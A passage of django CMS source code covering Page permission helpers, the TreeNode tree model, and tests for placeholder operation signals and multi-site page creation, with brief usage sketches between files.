from cms.utils.page_permissions import user_can_view_page
return user_can_view_page(user, page=self)
def has_view_restrictions(self, site):
from cms.models import PagePermission
if get_cms_setting('PERMISSION'):
page = self.get_draft_object()
restrictions = (
PagePermission
.objects
.for_page(page)
.filter(can_view=True)
)
return restrictions.exists()
return False
def has_add_permission(self, user):
"""
Has user ability to add page under current page?
"""
from cms.utils.page_permissions import user_can_add_subpage
return user_can_add_subpage(user, self)
def has_change_permission(self, user):
from cms.utils.page_permissions import user_can_change_page
return user_can_change_page(user, page=self)
def has_delete_permission(self, user):
from cms.utils.page_permissions import user_can_delete_page
return user_can_delete_page(user, page=self)
def has_delete_translation_permission(self, user, language):
from cms.utils.page_permissions import user_can_delete_page_translation
return user_can_delete_page_translation(user, page=self, language=language)
def has_publish_permission(self, user):
from cms.utils.page_permissions import user_can_publish_page
return user_can_publish_page(user, page=self)
def has_advanced_settings_permission(self, user):
from cms.utils.page_permissions import user_can_change_page_advanced_settings
return user_can_change_page_advanced_settings(user, page=self)
def has_change_permissions_permission(self, user):
"""
Has user ability to change permissions for current page?
"""
from cms.utils.page_permissions import user_can_change_page_permissions
return user_can_change_page_permissions(user, page=self)
def has_move_page_permission(self, user):
"""Has user ability to move current page?
"""
from cms.utils.page_permissions import user_can_move_page
return user_can_move_page(user, page=self)
def has_placeholder_change_permission(self, user):
if not self.publisher_is_draft:
return False
return self.has_change_permission(user)
def get_media_path(self, filename):
"""
Returns path (relative to MEDIA_ROOT/MEDIA_URL) to directory for storing
page-scope files. This allows multiple pages to contain files with
identical names without namespace issues. Plugins such as Picture can
use this method to initialise the 'upload_to' parameter for File-based
fields. For example:
image = models.ImageField(
_("image"), upload_to=CMSPlugin.get_media_path)
where CMSPlugin.get_media_path calls self.page.get_media_path
This location can be customised using the CMS_PAGE_MEDIA_PATH setting
"""
return join(get_cms_setting('PAGE_MEDIA_PATH'), "%d" % self.pk, filename)
def reload(self):
"""
Reload a page from the database
"""
return self.__class__.objects.get(pk=self.pk)
def _publisher_can_publish(self, language):
"""Is parent of this object already published?
"""
if self.is_page_type:
return False
if not self.parent_page:
return True
if self.parent_page.publisher_public_id:
return self.parent_page.get_public_object().is_published(language)
return False
def rescan_placeholders(self):
"""
Rescan and if necessary create placeholders in the current template.
"""
existing = OrderedDict()
placeholders = [pl.slot for pl in self.get_declared_placeholders()]
for placeholder in self.placeholders.all():
if placeholder.slot in placeholders:
existing[placeholder.slot] = placeholder
for placeholder in placeholders:
if placeholder not in existing:
existing[placeholder] = self.placeholders.create(slot=placeholder)
return existing
def get_declared_placeholders(self):
# inline import to prevent circular imports
from cms.utils.placeholder import get_placeholders
return get_placeholders(self.get_template())
def get_declared_static_placeholders(self, context):
# inline import to prevent circular imports
from cms.utils.placeholder import get_static_placeholders
return get_static_placeholders(self.get_template(), context)
def get_xframe_options(self):
""" Finds X_FRAME_OPTION from tree if inherited """
xframe_options = self.xframe_options or self.X_FRAME_OPTIONS_INHERIT
if xframe_options != self.X_FRAME_OPTIONS_INHERIT:
return xframe_options
# Ignore those pages which just inherit their value
ancestors = self.get_ancestor_pages().order_by('-node__path')
ancestors = ancestors.exclude(xframe_options=self.X_FRAME_OPTIONS_INHERIT)
        # Fetch only the clickjacking setting (nothing else)
xframe_options = ancestors.values_list('xframe_options', flat=True)
try:
return xframe_options[0]
except IndexError:
return None
class PageType(Page):
class Meta:
proxy = True
default_permissions = []
@classmethod
def get_root_page(cls, site):
pages = Page.objects.on_site(site).filter(
node__depth=1,
is_page_type=True,
)
return pages.first()
def is_potential_home(self):
return False
@python_2_unicode_compatible
class TreeNode(MP_Node):
parent = models.ForeignKey(
'self',
on_delete=models.CASCADE,
blank=True,
null=True,
related_name='children',
db_index=True,
)
site = models.ForeignKey(
Site,
on_delete=models.CASCADE,
verbose_name=_("site"),
related_name='djangocms_nodes',
db_index=True,
)
objects = PageNodeManager()
class Meta:
app_label = 'cms'
ordering = ('path',)
default_permissions = []
def __str__(self):
return self.path
@cached_property
def item(self):
return self.get_item()
def get_item(self):
        # Resolve the draft page attached to this node.
return Page.objects.get(node=self, publisher_is_draft=True)
@property
def is_branch(self):
return bool(self.numchild)
def get_ancestor_paths(self):
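        # Each ancestor's path is a proper prefix of this node's path, one
        # `steplen`-sized chunk per tree level; the `[1:]` slice drops the
        # empty prefix at position 0.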
paths = frozenset(
self.path[0:pos]
for pos in range(0, len(self.path), self.steplen)[1:]
)
return paths
def add_child(self, **kwargs):
if len(kwargs) == 1 and 'instance' in kwargs:
kwargs['instance'].parent = self
else:
kwargs['parent'] = self
return super(TreeNode, self).add_child(**kwargs)
def add_sibling(self, pos=None, *args, **kwargs):
if len(kwargs) == 1 and 'instance' in kwargs:
kwargs['instance'].parent_id = self.parent_id
else:
kwargs['parent_id'] = self.parent_id
return super(TreeNode, self).add_sibling(*args, **kwargs)
def update(self, **data):
cls = self.__class__
cls.objects.filter(pk=self.pk).update(**data)
for field, value in data.items():
setattr(self, field, value)
return
def get_cached_ancestors(self):
if self._has_cached_hierarchy():
return self._ancestors
return []
def get_cached_descendants(self):
if self._has_cached_hierarchy():
return self._descendants
return []
def _reload(self):
"""
Reload a page node from the database
"""
return self.__class__.objects.get(pk=self.pk)
def _has_cached_hierarchy(self):
return hasattr(self, '_descendants') and hasattr(self, '_ancestors')
def _set_hierarchy(self, nodes, ancestors=None):
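        # Cache ancestors/descendants on the node objects themselves so that
        # later traversals via get_cached_ancestors()/get_cached_descendants()
        # avoid extra database queries.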
if self.is_branch:
self._descendants = [node for node in nodes
if node.path.startswith(self.path)
and node.depth > self.depth]
else:
self._descendants = []
if self.is_root():
self._ancestors = []
else:
self._ancestors = ancestors
children = (node for node in self._descendants
if node.depth == self.depth + 1)
for child in children:
child._set_hierarchy(self._descendants, ancestors=([self] + self._ancestors))
```
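The tree helpers above delegate all hierarchy queries to the page's `node` (a `TreeNode`). A minimal usage sketch, assuming a draft `page` from a configured django CMS project (the function name is illustrative, not part of the codebase):

```python
def describe(page):
    # Sketch: exercises the tree and title helpers defined above.
    parent = page.get_parent_page()          # None for a root page
    children = page.get_child_pages()        # ordered by node path
    template = page.get_template()           # walks ancestors on inheritance
    title = page.get_title(language='en')    # falls back per i18n settings
    return parent, list(children), template, title
```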
#### File: cms/tests/test_placeholder_operation_signals.py
```python
from cms.api import add_plugin
from cms.models import Page, Placeholder, UserSettings
from cms.operations import (
ADD_PLUGIN,
ADD_PLUGINS_FROM_PLACEHOLDER,
CLEAR_PLACEHOLDER,
CHANGE_PLUGIN,
DELETE_PLUGIN,
CUT_PLUGIN,
MOVE_PLUGIN,
PASTE_PLUGIN,
PASTE_PLACEHOLDER,
)
from cms.signals import pre_placeholder_operation, post_placeholder_operation
from cms.test_utils.testcases import CMSTestCase
from cms.utils.compat.tests import UnittestCompatMixin
from cms.test_utils.util.context_managers import signal_tester
# TODO: Do this for app placeholders
class OperationSignalsTestCase(CMSTestCase, UnittestCompatMixin):
def _add_plugin(self, placeholder=None, plugin_type='LinkPlugin', language='en'):
placeholder = placeholder or self._cms_placeholder
plugin_data = {
'LinkPlugin': {'name': 'A Link', 'external_link': 'https://www.django-cms.org'},
'PlaceholderPlugin': {},
}
plugin = add_plugin(
placeholder,
plugin_type,
language,
**plugin_data[plugin_type]
)
return plugin
def _get_add_plugin_uri(self, language='en'):
uri = self.get_add_plugin_uri(
placeholder=self._cms_placeholder,
plugin_type='LinkPlugin',
language=language,
)
return uri
def setUp(self):
self._admin_user = self.get_superuser()
self._cms_page = self.create_homepage(
"home",
"nav_playground.html",
"en",
created_by=self._admin_user,
published=True,
)
self._cms_placeholder = self._cms_page.placeholders.get(slot='body')
def test_pre_add_plugin(self):
with signal_tester(pre_placeholder_operation) as env:
endpoint = self._get_add_plugin_uri()
data = {'name': 'A Link', 'external_link': 'https://www.django-cms.org'}
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
self.assertEqual(call_kwargs['operation'], ADD_PLUGIN)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(call_kwargs['placeholder'], self._cms_placeholder)
self.assertEqual(call_kwargs['plugin'].name, data['name'])
self.assertEqual(call_kwargs['plugin'].external_link, data['external_link'])
def test_post_add_plugin(self):
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
endpoint = self._get_add_plugin_uri()
data = {'name': 'A Link', 'external_link': 'https://www.django-cms.org'}
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], ADD_PLUGIN)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(post_call_kwargs['placeholder'], self._cms_placeholder)
self.assertTrue(post_call_kwargs['plugin'].pk)
self.assertEqual(post_call_kwargs['plugin'].name, data['name'])
self.assertEqual(post_call_kwargs['plugin'].external_link, data['external_link'])
def test_pre_edit_plugin(self):
plugin = self._add_plugin()
endpoint = self.get_admin_url(Page, 'edit_plugin', plugin.pk)
endpoint += '?cms_path=/en/'
with signal_tester(pre_placeholder_operation) as env:
data = {'name': 'A Link 2', 'external_link': 'https://www.django-cms.org'}
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
self.assertEqual(call_kwargs['operation'], CHANGE_PLUGIN)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(call_kwargs['placeholder'], self._cms_placeholder)
self.assertEqual(call_kwargs['old_plugin'].name, 'A Link')
self.assertEqual(call_kwargs['old_plugin'].external_link, data['external_link'])
self.assertEqual(call_kwargs['new_plugin'].name, data['name'])
self.assertEqual(call_kwargs['new_plugin'].external_link, data['external_link'])
def test_post_edit_plugin(self):
plugin = self._add_plugin()
endpoint = self.get_admin_url(Page, 'edit_plugin', plugin.pk)
endpoint += '?cms_path=/en/'
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
data = {'name': 'A Link 2', 'external_link': 'https://www.django-cms.org'}
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], CHANGE_PLUGIN)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(post_call_kwargs['placeholder'], self._cms_placeholder)
self.assertEqual(post_call_kwargs['old_plugin'].name, 'A Link')
self.assertEqual(post_call_kwargs['old_plugin'].external_link, data['external_link'])
self.assertEqual(post_call_kwargs['new_plugin'].name, data['name'])
self.assertEqual(post_call_kwargs['new_plugin'].external_link, data['external_link'])
def test_pre_delete_plugin(self):
plugin = self._add_plugin()
endpoint = self.get_admin_url(Page, 'delete_plugin', plugin.pk)
endpoint += '?cms_path=/en/'
with signal_tester(pre_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
data = {'post': True}
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 302)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
self.assertEqual(call_kwargs['operation'], DELETE_PLUGIN)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(call_kwargs['placeholder'], self._cms_placeholder)
self.assertEqual(call_kwargs['plugin'].name, 'A Link')
self.assertEqual(call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
def test_post_delete_plugin(self):
plugin = self._add_plugin()
endpoint = self.get_admin_url(Page, 'delete_plugin', plugin.pk)
endpoint += '?cms_path=/en/'
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
data = {'post': True}
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 302)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], DELETE_PLUGIN)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(post_call_kwargs['placeholder'], self._cms_placeholder)
self.assertEqual(post_call_kwargs['plugin'].name, 'A Link')
self.assertEqual(post_call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
def test_pre_move_plugin(self):
plugin = self._add_plugin()
endpoint = self.get_move_plugin_uri(plugin)
source_placeholder = plugin.placeholder
target_placeholder = self._cms_page.placeholders.get(slot='right-column')
data = {
'plugin_id': plugin.pk,
'target_language': 'en',
'placeholder_id': target_placeholder.pk,
}
with signal_tester(pre_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
self.assertEqual(call_kwargs['operation'], MOVE_PLUGIN)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(call_kwargs['plugin'].name, 'A Link')
self.assertEqual(call_kwargs['plugin'].placeholder, source_placeholder)
self.assertEqual(call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
self.assertEqual(call_kwargs['source_language'], 'en')
self.assertEqual(call_kwargs['source_placeholder'], source_placeholder)
self.assertEqual(call_kwargs['source_parent_id'], plugin.parent_id)
self.assertEqual(call_kwargs['target_language'], 'en')
self.assertEqual(call_kwargs['target_placeholder'], target_placeholder)
self.assertEqual(call_kwargs['target_parent_id'], None)
def test_post_move_plugin(self):
plugin = self._add_plugin()
endpoint = self.get_move_plugin_uri(plugin)
source_placeholder = plugin.placeholder
target_placeholder = self._cms_page.placeholders.get(slot='right-column')
data = {
'plugin_id': plugin.pk,
'target_language': 'en',
'placeholder_id': target_placeholder.pk,
}
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], MOVE_PLUGIN)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(post_call_kwargs['plugin'].name, 'A Link')
self.assertEqual(post_call_kwargs['plugin'].placeholder, target_placeholder)
self.assertEqual(post_call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
self.assertEqual(post_call_kwargs['source_language'], 'en')
self.assertEqual(post_call_kwargs['source_placeholder'], source_placeholder)
self.assertEqual(post_call_kwargs['source_parent_id'], plugin.parent_id)
self.assertEqual(post_call_kwargs['target_language'], 'en')
self.assertEqual(post_call_kwargs['target_placeholder'], target_placeholder)
self.assertEqual(post_call_kwargs['target_parent_id'], None)
def test_pre_cut_plugin(self):
user_settings = UserSettings.objects.create(
language="en",
user=self._admin_user,
clipboard=Placeholder.objects.create(slot='clipboard'),
)
plugin = self._add_plugin()
endpoint = self.get_move_plugin_uri(plugin)
data = {
'plugin_id': plugin.pk,
'target_language': 'en',
'placeholder_id': user_settings.clipboard_id,
}
with signal_tester(pre_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
self.assertEqual(call_kwargs['operation'], CUT_PLUGIN)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(call_kwargs['plugin'].name, 'A Link')
self.assertEqual(call_kwargs['plugin'].placeholder, self._cms_placeholder)
self.assertEqual(call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
self.assertEqual(call_kwargs['clipboard'], user_settings.clipboard)
self.assertEqual(call_kwargs['clipboard_language'], 'en')
self.assertEqual(call_kwargs['source_language'], 'en')
self.assertEqual(call_kwargs['source_placeholder'], self._cms_placeholder)
self.assertEqual(call_kwargs['source_parent_id'], plugin.parent_id)
def test_post_cut_plugin(self):
user_settings = UserSettings.objects.create(
language="en",
user=self._admin_user,
clipboard=Placeholder.objects.create(slot='clipboard'),
)
plugin = self._add_plugin()
endpoint = self.get_move_plugin_uri(plugin)
data = {
'plugin_id': plugin.pk,
'target_language': 'en',
'placeholder_id': user_settings.clipboard_id,
}
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], CUT_PLUGIN)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(post_call_kwargs['plugin'].name, 'A Link')
self.assertEqual(post_call_kwargs['plugin'].placeholder, user_settings.clipboard)
self.assertEqual(post_call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
self.assertEqual(post_call_kwargs['clipboard'], user_settings.clipboard)
self.assertEqual(post_call_kwargs['clipboard_language'], 'en')
self.assertEqual(post_call_kwargs['source_language'], 'en')
self.assertEqual(post_call_kwargs['source_placeholder'], self._cms_placeholder)
self.assertEqual(post_call_kwargs['source_parent_id'], plugin.parent_id)
def test_pre_paste_plugin(self):
user_settings = UserSettings.objects.create(
language="en",
user=self._admin_user,
clipboard=Placeholder.objects.create(slot='clipboard'),
)
plugin = self._add_plugin(placeholder=user_settings.clipboard)
endpoint = self.get_move_plugin_uri(plugin)
data = {
'plugin_id': plugin.pk,
'placeholder_id': self._cms_placeholder.pk,
'move_a_copy': 'true',
'target_language': 'en',
'plugin_order[]': ['__COPY__'],
}
with signal_tester(pre_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
self.assertEqual(call_kwargs['operation'], PASTE_PLUGIN)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(call_kwargs['plugin'].name, 'A Link')
self.assertEqual(call_kwargs['plugin'].placeholder, user_settings.clipboard)
self.assertEqual(call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
self.assertEqual(call_kwargs['target_language'], 'en')
self.assertEqual(call_kwargs['target_placeholder'], self._cms_placeholder)
self.assertEqual(call_kwargs['target_parent_id'], None)
def test_post_paste_plugin(self):
user_settings = UserSettings.objects.create(
language="en",
user=self._admin_user,
clipboard=Placeholder.objects.create(slot='clipboard'),
)
plugin = self._add_plugin(placeholder=user_settings.clipboard)
endpoint = self.get_move_plugin_uri(plugin)
data = {
'plugin_id': plugin.pk,
'placeholder_id': self._cms_placeholder.pk,
'target_language': 'en',
'move_a_copy': 'true',
'plugin_order[]': ['__COPY__'],
}
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], PASTE_PLUGIN)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(post_call_kwargs['plugin'].name, 'A Link')
self.assertEqual(post_call_kwargs['plugin'].placeholder, self._cms_placeholder)
self.assertEqual(post_call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
self.assertEqual(post_call_kwargs['target_language'], 'en')
self.assertEqual(post_call_kwargs['target_placeholder'], self._cms_placeholder)
self.assertEqual(post_call_kwargs['target_parent_id'], None)
def test_pre_paste_placeholder(self):
user_settings = UserSettings.objects.create(
language="en",
user=self._admin_user,
clipboard=Placeholder.objects.create(slot='clipboard'),
)
placeholder_plugin = self._add_plugin(
user_settings.clipboard,
'PlaceholderPlugin',
)
ref_placeholder = placeholder_plugin.placeholder_ref
self._add_plugin(ref_placeholder)
endpoint = self.get_move_plugin_uri(placeholder_plugin)
data = {
'plugin_id': placeholder_plugin.pk,
'placeholder_id': self._cms_placeholder.pk,
'move_a_copy': 'true',
'target_language': 'en',
'plugin_order[]': ['__COPY__'],
}
with signal_tester(pre_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
plugin = call_kwargs['plugins'][0].get_bound_plugin()
self.assertEqual(call_kwargs['operation'], PASTE_PLACEHOLDER)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(plugin.name, 'A Link')
self.assertEqual(plugin.placeholder, ref_placeholder)
self.assertEqual(plugin.external_link, 'https://www.django-cms.org')
self.assertEqual(call_kwargs['target_language'], 'en')
self.assertEqual(call_kwargs['target_placeholder'], self._cms_placeholder)
def test_post_paste_placeholder(self):
user_settings = UserSettings.objects.create(
language="en",
user=self._admin_user,
clipboard=Placeholder.objects.create(slot='clipboard'),
)
placeholder_plugin = self._add_plugin(
user_settings.clipboard,
'PlaceholderPlugin',
)
ref_placeholder = placeholder_plugin.placeholder_ref
self._add_plugin(ref_placeholder)
endpoint = self.get_move_plugin_uri(placeholder_plugin)
data = {
'plugin_id': placeholder_plugin.pk,
'placeholder_id': self._cms_placeholder.pk,
'target_language': 'en',
'move_a_copy': 'true',
'plugin_order[]': ['__COPY__'],
}
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
plugin = post_call_kwargs['plugins'][0].get_bound_plugin()
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], PASTE_PLACEHOLDER)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(plugin.name, 'A Link')
self.assertEqual(plugin.placeholder, self._cms_placeholder)
self.assertEqual(plugin.external_link, 'https://www.django-cms.org')
self.assertEqual(post_call_kwargs['target_language'], 'en')
self.assertEqual(post_call_kwargs['target_placeholder'], self._cms_placeholder)
def test_pre_add_plugins_from_placeholder(self):
plugin = self._add_plugin()
endpoint = self.get_admin_url(Page, 'copy_plugins') + '?cms_path=/en/'
source_placeholder = plugin.placeholder
target_placeholder = self._cms_page.placeholders.get(slot='right-column')
data = {
'source_language': 'en',
'source_placeholder_id': self._cms_placeholder.pk,
'target_language': 'de',
'target_placeholder_id': target_placeholder.pk,
}
with signal_tester(pre_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
en_plugin = call_kwargs['plugins'][0].get_bound_plugin()
self.assertEqual(call_kwargs['operation'], ADD_PLUGINS_FROM_PLACEHOLDER)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(plugin, en_plugin)
self.assertEqual(call_kwargs['source_language'], 'en')
self.assertEqual(call_kwargs['source_placeholder'], source_placeholder)
self.assertEqual(call_kwargs['target_language'], 'de')
self.assertEqual(call_kwargs['target_placeholder'], target_placeholder)
def test_post_add_plugins_from_placeholder(self):
plugin = self._add_plugin()
endpoint = self.get_admin_url(Page, 'copy_plugins') + '?cms_path=/en/'
source_placeholder = plugin.placeholder
target_placeholder = self._cms_page.placeholders.get(slot='right-column')
data = {
'source_language': 'en',
'source_placeholder_id': self._cms_placeholder.pk,
'target_language': 'de',
'target_placeholder_id': target_placeholder.pk,
}
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
new_plugin = post_call_kwargs['plugins'][0].get_bound_plugin()
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], ADD_PLUGINS_FROM_PLACEHOLDER)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertNotEqual(plugin, new_plugin)
self.assertEqual(new_plugin.name, 'A Link')
self.assertEqual(new_plugin.placeholder, target_placeholder)
self.assertEqual(new_plugin.external_link, 'https://www.django-cms.org')
self.assertEqual(post_call_kwargs['source_language'], 'en')
self.assertEqual(post_call_kwargs['source_placeholder'], source_placeholder)
self.assertEqual(post_call_kwargs['target_language'], 'de')
self.assertEqual(post_call_kwargs['target_placeholder'], target_placeholder)
def test_pre_clear_placeholder(self):
plugin = self._add_plugin()
endpoint = self.get_clear_placeholder_url(self._cms_placeholder)
with signal_tester(pre_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, {'test': 0})
self.assertEqual(response.status_code, 302)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
del_plugin = call_kwargs['plugins'][0]
self.assertEqual(call_kwargs['operation'], CLEAR_PLACEHOLDER)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(del_plugin.pk, plugin.pk)
self.assertEqual(call_kwargs['placeholder'], self._cms_placeholder)
def test_post_clear_placeholder(self):
plugin = self._add_plugin()
endpoint = self.get_clear_placeholder_url(self._cms_placeholder)
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, {'test': 0})
self.assertEqual(response.status_code, 302)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
del_plugin = post_call_kwargs['plugins'][0]
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], CLEAR_PLACEHOLDER)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(del_plugin.pk, plugin.pk)
self.assertEqual(post_call_kwargs['placeholder'], self._cms_placeholder)
```
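The tests above assert the keyword arguments delivered with each placeholder operation signal. A minimal receiver sketch, assuming a project with the CMS signals wired up (`log_plugin_additions` is an illustrative name, not part of the test suite):

```python
from cms.operations import ADD_PLUGIN
from cms.signals import post_placeholder_operation

def log_plugin_additions(sender, operation, language, token, origin, **kwargs):
    # Only react to plugin additions; other operations carry different kwargs.
    if operation == ADD_PLUGIN:
        print("plugin added in %s via %s (token %s)" % (language, origin, token))

post_placeholder_operation.connect(log_plugin_additions)
```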
#### File: cms/tests/test_site.py
```python
import copy
from django.contrib.sites.models import Site
from cms.api import create_page
from cms.models import Page, Placeholder
from cms.test_utils.testcases import CMSTestCase, URL_CMS_PAGE
from cms.utils.conf import get_cms_setting
from cms.utils.urlutils import admin_reverse
class SiteTestCase(CMSTestCase):
"""Site framework specific test cases.
All stuff which is changing settings.SITE_ID for tests should come here.
"""
def setUp(self):
self.assertEqual(Site.objects.all().count(), 1)
with self.settings(SITE_ID=1):
u = self._create_user("test", True, True)
# setup sites
self.site2 = Site.objects.create(domain="sample2.com", name="sample2.com", pk=2)
self.site3 = Site.objects.create(domain="sample3.com", name="sample3.com", pk=3)
self._login_context = self.login_user_context(u)
self._login_context.__enter__()
def tearDown(self):
self._login_context.__exit__(None, None, None)
def test_site_framework(self):
        # Test the site framework, and test if it's possible to disable it
with self.settings(SITE_ID=self.site2.pk):
create_page("page_2a", "nav_playground.html", "de", site=self.site2)
response = self.client.get("%s?site__exact=%s" % (URL_CMS_PAGE, self.site3.pk))
self.assertEqual(response.status_code, 200)
create_page("page_3b", "nav_playground.html", "de", site=self.site3)
with self.settings(SITE_ID=self.site3.pk):
create_page("page_3a", "nav_playground.html", "nl", site=self.site3)
# with param
self.assertEqual(Page.objects.on_site(self.site2.pk).count(), 1)
